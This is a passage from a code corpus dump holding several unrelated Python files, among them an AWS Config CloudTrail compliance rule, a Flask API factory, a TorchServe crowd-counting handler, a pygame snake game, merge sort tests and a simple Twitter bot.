\"+AWS_CLOUDTRAIL_S3_BUCKET_NAME+\" and proper encryption.\"\n }\n \n eval[\"ComplianceResourceType\"]=\"AWS::CloudTrail::Trail\"\n eval[\"ComplianceResourceId\"]=AWS_CLOUDTRAIL_NAME\n eval[\"ComplianceType\"]=response[\"ComplianceType\"]\n eval[\"Annotation\"]=response[\"Annotation\"]\n eval[\"OrderingTimestamp\"]=json.loads(event[\"invokingEvent\"])['notificationCreationTime']\n put_eval(eval, result_token) \n\ndef build_evaluation(event, complianceType, annotation, region, eval_resource_type = \"AWS::::Account\"):\n return {\n \"ComplianceResourceType\": eval_resource_type,\n \"ComplianceResourceId\": region['RegionName'] + \" \" + event['accountId'],\n \"ComplianceType\": complianceType,\n \"Annotation\": annotation,\n \"OrderingTimestamp\": str(json.loads(event[\"invokingEvent\"])['notificationCreationTime'])\n }\n\ndef get_sts_session(event, region_name=False):\n sts = boto3.client(\"sts\")\n RoleArn = event[\"executionRoleArn\"]\n if not region_name:\n region_name = event['configRuleArn'].split(\":\")[3]\n response = sts.assume_role(\n RoleArn=RoleArn,\n RoleSessionName='ComplianceAudit',\n DurationSeconds=900)\n sts_session = boto3.Session(\n aws_access_key_id=response['Credentials']['AccessKeyId'],\n aws_secret_access_key=response['Credentials']['SecretAccessKey'],\n aws_session_token=response['Credentials']['SessionToken'],\n region_name=region_name,\n botocore_session=None,\n profile_name=None)\n return(sts_session)\n\ndef put_eval(eval, token):\n config = STS_SESSION.client(\"config\")\n config.put_evaluations(\n Evaluations=[\n {\n \"ComplianceResourceType\": eval[\"ComplianceResourceType\"],\n \"ComplianceResourceId\": eval[\"ComplianceResourceId\"],\n \"ComplianceType\": eval[\"ComplianceType\"],\n \"Annotation\": eval[\"Annotation\"],\n \"OrderingTimestamp\": eval[\"OrderingTimestamp\"]\n },\n ],\n ResultToken=token\n )\n \n# This is the handler that is invoked by Lambda\ndef lambda_handler(event, context):\n global STS_SESSION\n STS_SESSION = ''\n \n global result_token\n if \"resultToken\" in event:\n result_token = event[\"resultToken\"]\n else:\n result_token = \"No token found.\"\n\n STS_SESSION = get_sts_session(event)\n \n cloudtrail_centralized_encrypted_lfi(event)","sub_path":"compliance-account-rulesets-setup/rule-code/CLOUDTRAIL_CENTRALIZED_ENCRYPTED_LFI.py","file_name":"CLOUDTRAIL_CENTRALIZED_ENCRYPTED_LFI.py","file_ext":"py","file_size_in_byte":10553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358295588","text":"#!/usr/bin/env python3\nfrom create_room import *\nfrom list_rooms import *\n\ndef underline(input, char = '-'):\n print(input)\n print(char*len(input))\n print()\n\nmenu_options = {1: 'create new rooms', 2: 'list rooms', 3: 'quit', 4: 'dump rooms to file', 5: 'delete room'}\n\ndef connect():\n client = MongoClient()\n db = client.test\n db.set_profiling_level(2)\n return db\n\ndef show_menu():\n underline('Welcome to adventure game')\n for x in menu_options:\n print('Press ', x,' to '+menu_options[x])\n choice = input('What would you like to do?')\n return menu_options[int(choice)]\n\ndef dump_to_file():\n output = open('rooms.txt', mode = 'wt', encoding='utf-8')\n db = connect()\n collection = db.rooms\n rooms = collection.find()\n for room in rooms:\n output.write(str(room['description']))\n output.close()\n\ndef delete_room(index):\n db = connect()\n collection = db.rooms\n collection.delete_one({'index':index})\n\ndef main():\n option = show_menu()\n if option == 'create new rooms':\n create_room()\n list_rooms()\n main()\n if option == 'list rooms':\n list_rooms()\n main()\n if option == 'dump rooms to file':\n dump_to_file()\n if option == 'delete room':\n choice = input('What room?')\n delete_room(choice)\n else:\n exit()\nmain()\n","sub_path":"python/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"634440730","text":"import datetime\n\nclass Artwork:\n def __init__(self, db_dict=None):\n if db_dict is None:\n db_dict = {'title': 'SampleTitle', 'author_name': 'SampleAuthor', 'author_link': 'Empty',\n 'author_logo': 'pics/no-pic.jpg', 'work_id': '00000', 'description': 'No', 'cover': 'no-pic.jpg',\n 'content': []}\n\n self.title = db_dict['title']\n self.author_name = db_dict['author_name']\n self.author_link = db_dict['author_link']\n self.author_logo = db_dict['author_logo']\n self.description = db_dict['description']\n self.id = db_dict['work_id']\n self.add_date = datetime.datetime.utcnow()\n self.content = db_dict['content']\n self.cover_url = db_dict['cover']\n\n\n\n def to_dict(self):\n return {\"title\": self.title, \"author_name\": self.author_name, \"author_link\": self.author_link,\n \"description\": self.description, \"author_logo\": self.author_logo, \"date\": self.add_date,\n \"work_id\": self.id, \"cover\":self.cover_url, \"content\": self.content}\n\n\ndef content_show(f):\n def wrapper(*args, **kwargs):\n result = f(*args, **kwargs)\n if result:\n return [str(item) for item in result]\n else:\n return 'Empty album'\n return wrapper\n\n\nclass Album:\n def __init__(self, data=[]):\n self.last_upload = 'None'\n self.container = []\n if type(data) is str:\n self.title = data\n else:\n self.title = data['name']\n if len(data['pics']) > 0:\n for work in data['pics']:\n self.container.append(Artwork(work))\n self.last_upload = self.container[-1].add_date\n\n\n def __len__(self):\n return len(self.container)\n\n def __getitem__(self, item):\n return self.container[item]\n\n def append(self, art_inst=Artwork):\n self.container.append(art_inst)\n self.last_upload = art_inst.add_date\n\n def remove_artwork(self, id):\n for i in range(len(self.container)):\n if self.container[i].id == id:\n self.container.pop(i)\n if len(self.container) > 0:\n self.last_upload = self.container[-1].add_date\n else:\n self.last_upload = \"None\"\n return 1\n return 0\n\n def pop(self, id_name):\n poped = 0\n for i in range(len(self.container)):\n if self.container[i].id == id_name:\n poped = self.container.pop(i)\n if len(self.container) > 0:\n self.last_upload = self.container[-1].add_date\n else:\n self.last_upload = \"None\"\n return poped\n return poped\n\n def rename(self, new_name):\n self.title = new_name\n\n def check_id(self, work_id):\n checker = False;\n for art in self.container:\n if art.id == work_id:\n checker = True\n break\n return checker\n\n\n\n\n @content_show\n def show_album(self):\n return self.container\n\n def to_dict(self):\n return {\"name\": self.title, \"last_updated\": self.last_upload, \"pics\": [item.to_dict() for item in self.container]}\n","sub_path":"arts.py","file_name":"arts.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"296155290","text":"import io\nimport logging\nimport numpy as np\nimport os\nimport zipfile\nimport torch\nfrom PIL import Image\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torchvision import transforms\nimport subprocess\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_pad(inputs,DIV=64):\n h,w = inputs.size()[-2:]\n ph,pw = (DIV-h%DIV),(DIV-w%DIV)\n # print(ph,pw)\n \n tmp_pad = [0,0,0,0]\n if (ph!=DIV): \n tmp_pad[2],tmp_pad[3] = 0,ph\n if (pw!=DIV):\n tmp_pad[0],tmp_pad[1] = 0,pw\n \n # print(tmp_pad)\n inputs = F.pad(inputs,tmp_pad)\n \n return inputs\n\nclass CrowdCounterHandler(object):\n \"\"\"\n MNISTDigitClassifier handler class. This handler takes a greyscale image\n and returns the digit in that image.\n \"\"\"\n\n def __init__(self):\n self.model = None\n self.mapping = None\n self.device = None\n self.batch_size = None\n self.initialized = False\n\n def initialize(self, ctx):\n \"\"\"First try to load torchscript else load eager mode state_dict based model\"\"\"\n\n properties = ctx.system_properties\n self.batch_size = int(properties.get(\"batch_size\"))\n logger.info('Context details: \\n {0}\\n'.format(str(ctx.system_properties)))\n self.device = torch.device(\"cuda:\" + str(properties.get(\"gpu_id\")) if torch.cuda.is_available() else \"cpu\")\n # self.device = torch.device(\"cpu\")\n model_dir = properties.get(\"model_dir\")\n logger.info('Model Dir: '+str(model_dir))\n # modelpath = os.path.join(model_dir,\"Network/crowdmodel_sha\")\n for file in os.listdir(model_dir):\n if zipfile.is_zipfile(file): \n logger.info('UnZipping File: '+str(file))\n with zipfile.ZipFile(file) as item:\n item.extractall() # extract it in the working directory\n \n # To Check if zip extracted correctly\n # cmd = ['ls', model_dir]\n # proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n \n # o, e = proc.communicate()\n \n # logger.info('Output: ' + o.decode('ascii'))\n # logger.info('Error: ' + e.decode('ascii'))\n\n from crowdmodel_sha import CrowdCounter\n \n # Read model serialize/pt file\n model_pt_path = os.path.join(model_dir, \"ssdcnet_sha_best_epoch.pth\")\n # Read model definition file\n model_def_path = os.path.join(model_dir, \"crowdmodel_sha.py\")\n if not os.path.isfile(model_def_path):\n raise RuntimeError(\"Missing the model definition file\")\n\n state_dict = torch.load(model_pt_path, map_location=self.device)\n self.model = CrowdCounter()\n self.model.load_state_dict(state_dict)\n self.model.to(self.device)\n self.model.eval()\n\n logger.info('Model file {0} loaded successfully'.format(model_pt_path))\n self.initialized = True\n\n def preprocess(self, request):\n \"\"\"\n Converts, pads, and normalizes a PIL image for CrowdCounting model,\n returns an Numpy array\n \"\"\"\n logger.info(\"Inside Preprocessing: \")\n image_tensor = None\n # self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n rgb_avg = [0.40954337, 0.36924595, 0.3595245]\n rgb_avg = np.array(rgb_avg).reshape(1,1,3)\n # rgb = mat['rgbMean'].reshape(1, 1, 3)\n \n for idx, data in enumerate(request):\n image = data.get(\"data\")\n if image is None:\n image = data.get(\"body\")\n \n # logger.info(\"Data: \"+ str(data))\n logger.info(\"Datatype: \"+ str(type(data)))\n image = Image.open(io.BytesIO(image)).convert('RGB')\n # image = Image.open(data).convert('RGB')\n image = transforms.ToTensor()(image)\n image = image[None,:,:,:]\n logger.info(\"Before padding: \"+ str(image.shape))\n image = get_pad(image,DIV=64)\n logger.info(\"After padding: \"+str(image.shape))\n image = image - torch.Tensor(rgb_avg).view(3,1,1)\n if image.shape is not None:\n if image_tensor is None:\n image_tensor = image\n print(\"inside if\")\n else:\n image_tensor = torch.cat((image_tensor, image), 0)\n print(\"inside else\")\n print(\"final images shape:\"+str(image_tensor.size()))\n return image_tensor.type(torch.float32).to(self.device)\n \n def inference(self, img):\n ''' Predict the count in the image using a SSDC-Net model.\n '''\n #output_counts = []\n features = self.model.forward(img)\n print(\"Feature type:\"+str(type(features)))\n for key, v in features.items():\n if (isinstance(v, list)):\n print(str(key) + \": \" +str(len(v)))\n else:\n print(str(key) + \": \" +str(v.size()))\n # print(\"Features:\"+str(features))\n # print(\"Feature shape:\"+str(features.shape))\n # num_rows, num_cols = features.shape\n \n div_res = self.model.resample(features)\n print(\"Div Res:\")\n for key, v in div_res.items():\n if (isinstance(v, list)):\n print(str(key) + \": \" +str(len(v)))\n else:\n print(str(key) + \": \" +str(v.size()))\n \n merge_res = self.model.parse_merge(div_res)\n print(\"Merge Result:\")\n for key, v in merge_res.items():\n if (isinstance(v, list)):\n print(str(key) + \": \" +str(len(v)))\n else:\n print(str(key) + \": \" +str(v.size()))\n logger.info(\"before outputs: \")\n \n output_counts = []\n for i in range(merge_res['div'+str(self.model.div_times)].size()[0]):\n logger.info(\"iter: \" + str(i))\n # print(type(merge_res['div2']))\n # print(str(merge_res['div2'].size()))\n # print(type(merge_res['div2'][0]))\n # print(str(merge_res['div2'][0].size()))\n outputs = merge_res['div'+str(self.model.div_times)][i].sum()\n outputs = round(outputs.item())\n # print(type(outputs))\n print(str(outputs))\n output_counts.append(outputs)\n logger.info(\"before returning: \")\n return output_counts\n\n # def postprocess(self, inference_output):\n # return inference_output\n\n\n_service = CrowdCounterHandler()\n\n\ndef handle(data, context):\n if not _service.initialized:\n _service.initialize(context)\n\n if data is None:\n return None\n # logger.info(\"Data: \"+ str(data))\n logger.info(\"Datatype: \"+ str(type(data)))\n data = _service.preprocess(data)\n logger.info(\"Done preprocessin...\")\n data = _service.inference(data)\n logger.info(\"done inference... \")\n torch.cuda.empty_cache()\n # data = _service.postprocess(data)\n\n return data\n","sub_path":"utils/crdcnt_handler_sha_gpu.py","file_name":"crdcnt_handler_sha_gpu.py","file_ext":"py","file_size_in_byte":7024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"349585871","text":"# -*- coding: utf-8 -*-\n\"\"\"Flask App for MPContribs API\"\"\"\nimport logging\nimport boto3\nimport requests\n\nfrom importlib import import_module\nfrom flask import Flask, current_app, request\nfrom flask_marshmallow import Marshmallow\nfrom flask_mongoengine import MongoEngine\nfrom flask_mongorest import register_class\nfrom flask_log import Logging\nfrom flask_sse import sse\nfrom flask_compress import Compress\nfrom flasgger.base import Swagger\n\nfrom mongoengine import ValidationError\nfrom mongoengine.base.datastructures import BaseDict\nfrom itsdangerous import URLSafeTimedSerializer\nfrom string import punctuation\nfrom boltons.iterutils import remap, default_enter\nfrom notebook.utils import url_path_join\nfrom notebook.gateway.managers import GatewayClient\nfrom requests.exceptions import ConnectionError\n\n\ndelimiter, max_depth = \".\", 4\ninvalidChars = set(punctuation.replace(\"*\", \"\"))\ninvalidChars.add(\" \")\n\nfor mod in [\n \"matplotlib\",\n \"toronado.cssutils\",\n \"selenium.webdriver.remote.remote_connection\",\n \"botocore\",\n \"websockets.protocol\",\n \"asyncio\",\n]:\n log = logging.getLogger(mod)\n log.setLevel(\"INFO\")\n\nlogger = logging.getLogger(\"app\")\nsns_client = boto3.client(\"sns\")\n\n\ndef enter(path, key, value):\n if isinstance(value, BaseDict):\n return dict(), value.items()\n elif isinstance(value, list):\n dot_path = delimiter.join(list(path) + [key])\n raise ValidationError(f\"lists not allowed ({dot_path})!\")\n\n return default_enter(path, key, value)\n\n\ndef valid_key(key):\n for char in key:\n if char in invalidChars:\n raise ValidationError(f\"invalid character {char} in {key}\")\n\n\ndef visit(path, key, value):\n key = key.strip()\n\n if len(path) + 1 > max_depth:\n dot_path = delimiter.join(list(path) + [key])\n raise ValidationError(f\"max nesting ({max_depth}) exceeded for {dot_path}\")\n\n valid_key(key)\n return key, value\n\n\ndef valid_dict(dct):\n remap(dct, visit=visit, enter=enter)\n\n\ndef send_email(to, subject, template):\n sns_client.publish(TopicArn=to, Message=template, Subject=subject)\n\n\ndef get_collections(db):\n \"\"\"get list of collections in DB\"\"\"\n conn = db.app.extensions[\"mongoengine\"][db][\"conn\"]\n dbname = db.app.config.get(\"MPCONTRIBS_DB\")\n return conn[dbname].list_collection_names()\n\n\ndef get_resource_as_string(name, charset=\"utf-8\"):\n \"\"\"http://flask.pocoo.org/snippets/77/\"\"\"\n with current_app.open_resource(name) as f:\n return f.read().decode(charset)\n\n\ndef get_kernels():\n \"\"\"retrieve list of kernels from KernelGateway service\"\"\"\n gw_client = GatewayClient.instance()\n base_endpoint = url_path_join(gw_client.url, gw_client.kernels_endpoint)\n\n try:\n r = requests.get(base_endpoint)\n except ConnectionError:\n print(\"WARNING: Kernel Gateway NOT AVAILABLE\")\n return None\n\n kernels = r.json()\n return {kernel[\"id\"]: None for kernel in kernels}\n\n\ndef get_consumer():\n groups = request.headers.get(\"X-Authenticated-Groups\", \"\").split(\",\")\n groups += request.headers.get(\"X-Consumer-Groups\", \"\").split(\",\")\n return {\n \"username\": request.headers.get(\"X-Consumer-Username\"),\n \"apikey\": request.headers.get(\"X-Consumer-Custom-Id\"),\n \"groups\": \",\".join(set(groups)),\n }\n\n\ndef create_app():\n \"\"\"create flask app\"\"\"\n app = Flask(__name__)\n app.config.from_pyfile(\"config.py\", silent=True)\n logger.warning(\"database: \" + app.config[\"MPCONTRIBS_DB\"])\n app.config[\"USTS\"] = URLSafeTimedSerializer(app.secret_key)\n app.jinja_env.globals[\"get_resource_as_string\"] = get_resource_as_string\n app.jinja_env.lstrip_blocks = True\n app.jinja_env.trim_blocks = True\n DEBUG = app.config.get(\"DEBUG\")\n\n if DEBUG:\n from flask_cors import CORS\n\n CORS(app) # enable for development (allow localhost)\n\n Compress(app)\n Logging(app)\n Marshmallow(app)\n MongoEngine(app)\n Swagger(app, template=app.config.get(\"TEMPLATE\"))\n setattr(app, \"kernels\", get_kernels())\n\n # NOTE: hard-code to avoid pre-generating for new deployment\n # collections = get_collections(db)\n collections = [\n \"projects\",\n \"contributions\",\n \"tables\",\n \"structures\",\n \"notebooks\",\n ]\n\n for collection in collections:\n module_path = \".\".join([\"mpcontribs\", \"api\", collection, \"views\"])\n try:\n module = import_module(module_path)\n except ModuleNotFoundError as ex:\n logger.warning(f\"API module {module_path}: {ex}\")\n continue\n\n try:\n blueprint = getattr(module, collection)\n app.register_blueprint(blueprint, url_prefix=\"/\" + collection)\n klass = getattr(module, collection.capitalize() + \"View\")\n register_class(app, klass, name=collection)\n logger.warning(f\"{collection} registered\")\n except AttributeError as ex:\n logger.warning(f\"Failed to register {module_path}: {collection} {ex}\")\n\n ## TODO discover user-contributed views automatically\n ## TODO revive redox_thermo_csp again\n ## TODO only load for main deployment\n # collection = \"redox_thermo_csp\"\n # module_path = \".\".join([\"mpcontribs\", \"api\", collection, \"views\"])\n # try:\n # module = import_module(module_path)\n # blueprint = getattr(module, collection)\n # app.register_blueprint(blueprint, url_prefix=\"/\" + collection)\n # logger.warning(f\"{collection} registered\")\n # except ModuleNotFoundError as ex:\n # logger.warning(f\"API module {module_path}: {ex}\")\n\n def healthcheck():\n if not DEBUG and not app.kernels:\n return \"KERNEL GATEWAY NOT AVAILABLE\", 500\n\n return \"OK\"\n\n app.register_blueprint(sse, url_prefix=\"/stream\")\n app.add_url_rule(\"/healthcheck\", view_func=healthcheck)\n logger.warning(\"app created.\")\n return app\n","sub_path":"mpcontribs-api/mpcontribs/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524893232","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 10 14:48:17 2018\n\n@author: pnolan86\n\"\"\"\n\nfrom os import listdir\nfrom netCDF4 import Dataset\nimport numpy as np\nfiles = listdir('wrf_les/')\nxdim = 1008\nydim = 882\nzdim = 20\nheight_level = 1\ntime = np.empty([len(files)])\nu = np.empty([len(files),ydim,xdim])\nv = np.empty([len(files),ydim,xdim])\n\ntt=0\nprint(tt)\nncfile='wrf_les/'+files[tt]\nroot = Dataset(ncfile,'r') #read the data\nvars = root.variables #dictionary, all variables in dataset\nx = vars['x0'][:]*1000\ny = vars['y0'][:]*1000\nz = vars['z1'][:]*1000\nlon = vars['lon0'][:]\nlat = vars['lat0'][:]\nproj_center_lon = getattr(vars['grid_mapping_0'],'longitude_of_projection_origin')\nproj_center_lat = getattr(vars['grid_mapping_0'],'latitude_of_projection_origin')\ntime[tt] = vars['time'][:]\nu[tt,:,:] = vars['UGRD_HTGL'][0,height_level,:,:].squeeze()\nv[tt,:,:] = vars['VGRD_HTGL'][0,height_level,:,:].squeeze()\n\nfor tt in range(1,len(files)):\n print(tt)\n ncfile='wrf_les/'+files[tt]\n root = Dataset(ncfile,'r') #read the data\n vars = root.variables #dictionary, all variables in dataset\n time[tt] = vars['time'][:]\n u[tt,:,:] = vars['UGRD_HTGL'][0,height_level,:,:].squeeze()\n v[tt,:,:] = vars['VGRD_HTGL'][0,height_level,:,:].squeeze()\n\n \nprint('save')\nnp.savez('wrf_les_4_animation'+str(height_level)+'.npz',time=time,x=x,y=y,lon=lon,lat=lat,proj_center_lon=proj_center_lon,proj_center_lat=proj_center_lat,u=u,v=v) \n","sub_path":"7-17/process_wrf_data_4_animation.py","file_name":"process_wrf_data_4_animation.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"261578952","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.base_todo, name='base_todo'),\n path('notification',views.index_todo,name='notification'),\n path('calender',views.calender,name='calender'),\n path('add', views.addTodo, name='add'),\n path('complete/', views.completeTodo, name='complete'),\n path('deletecomplete', views.deleteCompleted, name='deletecomplete'),\n path('deleteall', views.deleteAll, name='deleteall'),\n]\n","sub_path":"learning_user/todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"7645407","text":"import pygame\r\nimport sys\t\t# These are IMPORT-ant!\r\nimport random\t# \t ;D\r\nimport time\r\n\r\nclass snake():\r\n\tdef __init__(self):\r\n\t\tself.position = [50, 50]\t# Starts the snake in the top left corner\r\n\t\tself.body = [[50, 50], [40, 50]]\t#Starts the first body segments to the left of the snake's \"head\"\r\n\t\tself.direction = \"right\"\t#Starts the snake out moving to the right\r\n\t\tself.changeDirection = self.direction\r\n\r\n\tdef move(self, foodPosition):\t# Basic up, down, left, and right movement, as well as adding more body segments\r\n\t\tif self.direction == \"up\":\r\n\t\t\tself.position[1] -= 10\r\n\t\tif self.direction == \"down\":\r\n\t\t\tself.position[1] += 10\r\n\t\tif self.direction == \"left\":\r\n\t\t\tself.position[0] -= 10\r\n\t\tif self.direction == \"right\":\r\n\t\t\tself.position[0] += 10\r\n\t\tself.body.insert(0, self.position[:])\r\n\t\tif self.position == foodPosition:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tself.body.pop()\r\n\t\t\treturn False\r\n\r\n\tdef turn(self, dir):\t# Lets the player change movement direction, but disallows re-tracing the snake's trail\r\n\t\tif dir == \"up\" and not self.direction == \"down\":\r\n\t\t\tself.direction = \"up\"\r\n\t\tif dir == \"down\" and not self.direction == \"up\":\r\n\t\t\tself.direction = \"down\"\r\n\t\tif dir == \"left\" and not self.direction == \"right\":\r\n\t\t\tself.direction = \"left\"\r\n\t\tif dir == \"right\" and not self.direction == \"left\":\r\n\t\t\tself.direction = \"right\"\r\n\r\n\tdef collision(self):\t# Checks if the player's snake has collided with the outer walls\r\n\t\tif self.position[0] > 790 or self.position[0] < 0:\r\n\t\t\treturn True\r\n\t\telif self.position[1] > 790 or self.position[1] < 0:\r\n\t\t\treturn True\r\n\t\tfor bodyPart in self.body[1:]:\r\n\t\t\tif self.position == bodyPart:\r\n\t\t\t\treturn True\r\n\t\treturn False\r\n\r\n\tdef snakeBody(self):\r\n\t\treturn self.body\r\n\r\nclass foodSpawner():\t# Random initial food piece spawn location\r\n\tdef __init__(self):\r\n\t\tself.position = [random.randrange(1, 70) * 10, random.randrange(1, 70) * 10]\r\n\t\tself.isFoodInWindow = True\r\n\r\n\tdef spawnFood(self):\t# Random food piece spawn location for the rest of the food pieces\r\n\t\tif self.isFoodInWindow == False:\r\n\t\t\tself.position = [random.randrange(1, 70) * 10, random.randrange(1, 70) * 10]\r\n\t\t\tself.isFoodInWindow = True\r\n\t\treturn self.position\r\n\r\n\tdef foodInWindow(self, a):\r\n\t\tself.isFoodInWindow = a\r\n\r\ndef close():\t# Exits the game\r\n\tpygame.quit()\r\n\tsys.exit()\r\n\r\ngame_window = pygame.display.set_mode((800, 800))\t# Game window size\r\nfps = pygame.time.Clock()\r\nscore = 0\r\nplayer = snake()\t# Calls the snake class\r\nspawnFood = foodSpawner()\t# Calls the food spawner class\r\n\r\nwhile True:\t\t# Checks what keys are being pressed, if the player has collected a food piece, draws snake and food, and sets \r\n\tfor event in pygame.event.get():\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\tclose();\r\n\t\telif event.type == pygame.KEYDOWN:\r\n\t\t\tif event.key == pygame.K_ESCAPE:\r\n\t\t\t\tclose();\r\n\t\t\tif event.key == pygame.K_UP:\r\n\t\t\t\tplayer.turn(\"up\")\r\n\t\t\tif event.key == pygame.K_DOWN:\r\n\t\t\t\tplayer.turn(\"down\")\r\n\t\t\tif event.key == pygame.K_LEFT:\r\n\t\t\t\tplayer.turn(\"left\")\r\n\t\t\tif event.key == pygame.K_RIGHT:\r\n\t\t\t\tplayer.turn(\"right\")\r\n\tfoodPosition = spawnFood.spawnFood()\r\n\tif player.move(foodPosition) == 1:\r\n\t\tscore += 1\r\n\t\tspawnFood.foodInWindow(False)\r\n\r\n\tgame_window.fill(pygame.Color(183, 255, 241))\t# Fills game window in with specified color\r\n\tfor position in player.snakeBody():\r\n\t\tpygame.draw.rect(game_window, pygame.Color(53, 135, 186), pygame.Rect(position[0], position[1], 10, 10))\t# Draws the player's snake\r\n\tpygame.draw.rect(game_window, pygame.Color(163, 124, 255), pygame.Rect(foodPosition[0], foodPosition[1], 10, 10))\t\t# Draws the food pieces\r\n\tif player.collision() == 1:\t\t# If the player collides with an outer wall, the game will close (player loses)\r\n\t\tclose();\r\n\tpygame.display.set_caption(\"<~> SERPENTES <~> YOUR SCORE: \" + str(score) + \" <~>\")\t# Sets game window title to show play score and game title\r\n\tpygame.display.flip()\t# Refreshes/updates the game window\r\n\tfps.tick(30)\t# Sets tick rate (fps)\r\n","sub_path":"serpentesGame.py","file_name":"serpentesGame.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528527801","text":"def merge_sort(list_to_sort):\n if len(list_to_sort) <= 1:\n return list_to_sort\n\n diving_point = len(list_to_sort) // 2\n first_part = merge_sort(list_to_sort[:diving_point])\n second_part = merge_sort(list_to_sort[diving_point:])\n\n sorted_list = []\n i = 0\n j = 0\n while first_part or second_part:\n if first_part[i] > second_part[j]:\n sorted_list.append(second_part.pop(j))\n else:\n sorted_list.append(first_part.pop(i))\n\n if not first_part or not second_part:\n sorted_list.extend(first_part or second_part)\n break\n return sorted_list\n\n\ndef test_merge_sort():\n assert merge_sort([38, 27, 43, 3, 9, 82, 10]) == [3, 9, 10, 27, 38, 43, 82]\n\n\ndef test_merge_sort_on_empty_list():\n assert merge_sort([]) == []\n\n\ndef test_merge_sort_on_one_item_list():\n assert merge_sort([1]) == [1]\n\n\ndef test_merge_sort_on_two_item_list():\n assert merge_sort([2, 1]) == [1, 2]\n\n\ndef test_merge_sort_on_random_numbers():\n import random\n list_to_sort = random.sample(range(1, 100), 99)\n assert merge_sort(list_to_sort) == sorted(list_to_sort)\n","sub_path":"merge_sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544573424","text":"\n# -*- coding: utf-8 -*-\n\n\nimport tweepy, time, sys, random\n\n#argfile = str(sys.argv[1])\n\nCONSUMER_KEY = ''\nCONSUMER_SECRET = ''\n\nACCESS_KEY = ''\nACCESS_SECRET = ''\n\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nif ACCESS_KEY:\n \n auth.set_access_token(ACCESS_KEY, ACCESS_SECRET) #used for access keys\n api = tweepy.API(auth)\n\nelse: ##This block will send the user to an auth link and ask to verify\n ##Authenication dance for users\n try:\n redirect_url = auth.get_authorization_url()\n except tweepy.TweepError:\n print(\"Error! Failed to get request token.\")\n\n #session.set('request_token', auth.request_token)\n\n print(redirect_url)\n\n verifier = input('Verifier: ') #prompts the user to enter verification code\n\n #token = session.get('request_token')\n #session.delete('request_token')\n #auth.request_token = token\n\n #auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n try:\n auth.get_access_token(verifier)\n except tweepy.TweepError:\n print(\"Error! Failed to get access token.\")\n\n #auth.set_access_token(key, secret)\n\n print(\"Access Token: \" + auth.access_token)\n print(\"Access Token Secret: \" + auth.access_token_secret)\n\n api = tweepy.API(auth)\n\n#api.update_status(status='Firing up')\n\nwhile True:\n random.seed()\n num = random.randint(1, 10)\n if num == 3:\n api.update_status(status='3!!!!!!!')\n #print(\"3!!!!!!!\")\n else:\n api.update_status(status=num)\n #print(num)\n time.sleep(60)\n\n\n\n\n\n\n\n\n\"\"\"\napi = tweepy.API(auth)\n\nfilename = open(argfile, 'r')\nf = filename.readlines()\nfilename.close()\n\nfor line in f:\n api.update_status(status = line)\n time.sleep(900) #tweet every fifteen minutes\n \"\"\"\n\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"500912115","text":"import keras.preprocessing.text as kt\nimport numpy as np\nimport random\nimport argparse\nfrom keras.models import model_from_json, Model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.optimizers import Adam\nimport tensorflow as tf\nimport json\nimport datamodule\nfrom ReplayBuffer import ReplayBuffer\nfrom ActorNetwork import ActorNetwork\nfrom CriticNetwork import CriticNetwork\nfrom OU import OU\nimport timeit\nfrom sklearn.preprocessing import normalize\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\nimport math\nfrom keras.initializers import normal, identity, VarianceScaling\nfrom keras.models import model_from_json\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Flatten, Input, merge, Lambda\nfrom keras.optimizers import Adam\nfrom keras.layers.normalization import BatchNormalization\n\n# Tensorflow GPU optimization\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nfrom keras import backend as K\n\nK.set_session(sess)\n\n# same preprocessing routine of the reference\n\n# load NSL-KDD dataset\nDATA_PATH = '/home/tkdrlf9202/PycharmProjects/DDPG-Keras-AD'\ndata_train, data_test = datamodule.loader_all(DATA_PATH)\nidx_discrete = [1, 2, 3]\nidx_continuous = range(len(data_train[0]))\nidx_continuous = np.delete(idx_continuous, idx_discrete).tolist()\n\ndata_train_cont, data_train_disc, data_train_class = datamodule.preprocess(data_train, idx_continuous, idx_discrete)\ndata_test_cont, data_test_disc, data_test_class = datamodule.preprocess(data_test, idx_continuous, idx_discrete)\n\n# generate tokenizer, one per discrete 